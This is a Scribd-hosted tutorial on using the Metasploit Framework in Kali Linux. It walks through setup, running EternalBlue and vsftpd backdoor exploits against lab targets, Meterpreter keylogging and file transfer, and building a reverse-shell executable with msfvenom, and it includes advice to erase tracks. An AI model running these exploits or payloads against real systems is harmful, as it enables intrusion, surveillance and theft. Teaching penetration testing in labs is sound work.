KEMBAR78
Metasploit Guide | PDF | Information Technology | Computer Engineering
Scribd
Upload
21 views5 pages

Metasploit Guide

Guide on how to use Metasploit Framework (MSF) in kali Linux

Uploaded by

sahilborse114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
21 views5 pages

Metasploit Guide

Guide on how to use Metasploit Framework (MSF) in kali Linux

Uploaded by

sahilborse114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Using Metasploit in Kali Linux: A

Detailed Guide
This guide provides step-by-step instructions on how to install, configure, and use Metasploit Framework (MSF) in Kali Linux.
Metasploit is a powerful open-source tool for penetration testing, exploit development, and vulnerability assessment. Kali Linux
comes with Metasploit pre-installed, but we'll cover updates and basic usage.

Note: This guide assumes you are running Kali Linux as root or with sudo privileges. Always use Metasploit ethically and legally,
such as in a controlled lab environment. Unauthorized use can lead to legal consequences.

Prerequisites
Kali Linux installed (virtual machine or physical).
Basic knowledge of Linux terminal commands.
A target machine or virtual environment for testing (e.g., Metasploitable VM).
Ensure your system is up to date:

sudo apt update && sudo apt upgrade -y

Step 1: Install or Update Metasploit


Kali Linux includes Metasploit by default, but it's good to ensure it's updated.

1. Update the package list:

sudo apt update

2. Install or upgrade Metasploit if needed:

sudo apt install metasploit-framework -y

3. Verify installation:

msfconsole --version

This should display the version (e.g., Framework Version: 6.x.x).

Step 2: Configure the PostgreSQL Database


Metasploit uses a PostgreSQL database to store information like hosts, vulnerabilities, and sessions. It's essential for efficient
workflow.
1. Start the PostgreSQL service:

sudo systemctl start postgresql

2. Enable PostgreSQL to start on boot:

sudo systemctl enable postgresql

3. Initialize the Metasploit database:

sudo msfdb init

This creates the database and user if not already set up.

4. Verify the database status:

sudo msfdb status

Step 3: Launch Metasploit Console


The primary interface is msfconsole, a command-line tool.

1. Start Metasploit:

sudo msfconsole

You'll see the MSF banner and prompt: msf6 >

If you encounter database connection issues, run db_status inside msfconsole to check.

Step 4: Basic Commands in Metasploit


Once in msfconsole, use these commands to navigate and operate.

1. Search for Modules: Metasploit has thousands of modules (exploits, auxiliaries, payloads, etc.).

search <keyword>

Example: Search for EternalBlue exploit:

search eternalblue

2. Use a Module: Load a specific module.


use <module_path>

Example:

use exploit/windows/smb/ms17_010_eternalblue

3. Show Information: View details about the loaded module.

info

4. Show Options: Display required and optional settings.

show options

5. Set Options: Configure variables like target IP (RHOSTS) or payload.

set <option> <value>

Examples:

set RHOSTS 192.168.1.100 # Target IP

set LHOST 192.168.1.50 # Your Kali IP for reverse connections

set PAYLOAD windows/meterpreter/reverse_tcp # Set a payload

6. Show Payloads: List compatible payloads for the exploit.

show payloads

7. Exploit the Target: Run the exploit.

exploit

Or use run for auxiliary modules.

8. Background a Session: If you gain a Meterpreter session, background it to multitask.

background

List sessions:
sessions

Interact with a session:

sessions -i <session_id>

9. Meterpreter Commands (Post-Exploitation): Once in a Meterpreter shell (meterpreter >):

Get system info: sysinfo


Screenshot: screenshot
Keylogger: keyscan_start, then keyscan_dump
Upload file: upload /path/to/local/file /remote/path
Download file: download /remote/path /local/path
Exit: exit

10. Other Useful Commands:

Help: help or ?
Back to previous menu: back
Exit MSF: exit
Update Metasploit database: db_rebuild_cache
Scan for hosts: Use auxiliary modules like use auxiliary/scanner/discovery/udp_sweep

Step 5: Example Workflow: Exploiting a


Vulnerable Target
Let's simulate exploiting Metasploitable 2 (a vulnerable VM).

1. Start msfconsole:

sudo msfconsole

2. Search for vsftpd backdoor exploit:

search vsftpd

3. Use the module:

use exploit/unix/ftp/vsftpd_234_backdoor

4. Set options:

set RHOSTS <target_ip> # e.g., 192.168.1.101


5. Run the exploit:

exploit

6. If successful, you'll get a shell. Upgrade to Meterpreter if needed.

Step 6: Advanced Tips


Update Metasploit: Run msfupdate inside msfconsole (or use apt).
Create Custom Payloads: Use msfvenom for standalone payloads. Example: Create a Windows reverse TCP executable:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe > payload.exe

Armitage GUI: For a graphical interface, install and run armitage.


Nmap Integration: Run Nmap from MSF:

db_nmap -sV <target_ip>

Troubleshooting:
Database errors: Run msfdb reinit.
Permission issues: Ensure running as root.

Step 7: Cleanup and Exit


Close sessions: sessions -k
Stop services if needed: sudo systemctl stop postgresql
Always erase tracks in real pentests.

Resources
Official Documentation: https://docs.metasploit.com/ (https://docs.metasploit.com/)
Kali Linux Docs: https://www.kali.org/docs/ (https://www.kali.org/docs/)
Practice: Set up Metasploitable VM from Rapid7.

This guide is for educational purposes only.

You might also like